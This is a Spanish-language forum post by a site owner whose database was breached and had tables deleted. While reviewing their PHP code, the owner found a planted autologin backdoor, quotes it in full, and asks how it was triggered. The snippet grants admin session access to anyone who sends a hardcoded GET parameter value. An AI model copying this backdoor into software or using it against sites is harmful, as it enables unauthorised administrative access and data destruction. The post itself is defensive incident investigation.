Hola , resulta que tengo un script y hace poco tuvimos un ataque mediante el cual entraron a nuestra database y borraron algunas tablas de forma manual ; de manera que empezamos a investigar el codigo php y encontramos un backdoor de autologin.
Este es el codigo :
Código:
if ( $_GET['autologin'] == "runnow123@" )
{
$admin = $db->fetchRow( "SELECT * FROM admin LIMIT 1" );
$_SESSION['admin_username'] = $admin['username'];
$_SESSION['admin_password'] = $admin['password'];
header( "location: admin.php?view=dashboard" );
exit( );
Me gustaria saber como ejecutar ese codigo para saber como hicieron para entrar en mi database o si tienen mayor informacion es de gran ayuda.
Muchas gracias.